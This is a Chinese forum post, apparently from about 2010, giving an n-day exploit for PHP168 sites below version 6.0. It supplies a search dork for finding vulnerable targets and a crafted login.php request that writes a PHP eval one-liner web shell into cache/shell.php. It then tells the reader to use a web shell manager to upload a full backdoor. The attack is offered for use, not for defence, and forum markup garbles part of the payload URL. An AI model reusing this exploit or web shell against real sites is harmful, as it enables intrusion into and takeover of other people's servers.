|
  
- 帖子
- 3852
- 积分
- 13044
- 威望
- 16780
- 金钱
- 36761
- 在线时间
- 1139 小时
         
|
PHP168漏洞 Nday
1,适用于PHP168 6.0以下版本
2,搜索关键字:Powered by php168 inurl:login.php
3,随便找一个试试:例如:www.xxxxxxxxx.com/login.php
4:在www.xxxxxxxxx.com/login.php后面加上 ?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<[email=?php%20@eval($_POST[a]);?]?php%20@eval($_POST[a]);?[/email] >
即组成:[url=http://www.xxxxxxxxx.com/login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=al($_POST[a[/email] >[/url]]);?
5,没有返回错误 那就继续
www.xxxxxxxxx.com/cache/shell.php 就是一句话的地址 【<?php%20@eval($_POST[a]);?> 】
6,用lanker微型PHP+ASP管理器1.0双用版 上传大马 |
|
发表于 2010-1-9 15:47
| 
发表于 2010-3-14 15:50
| 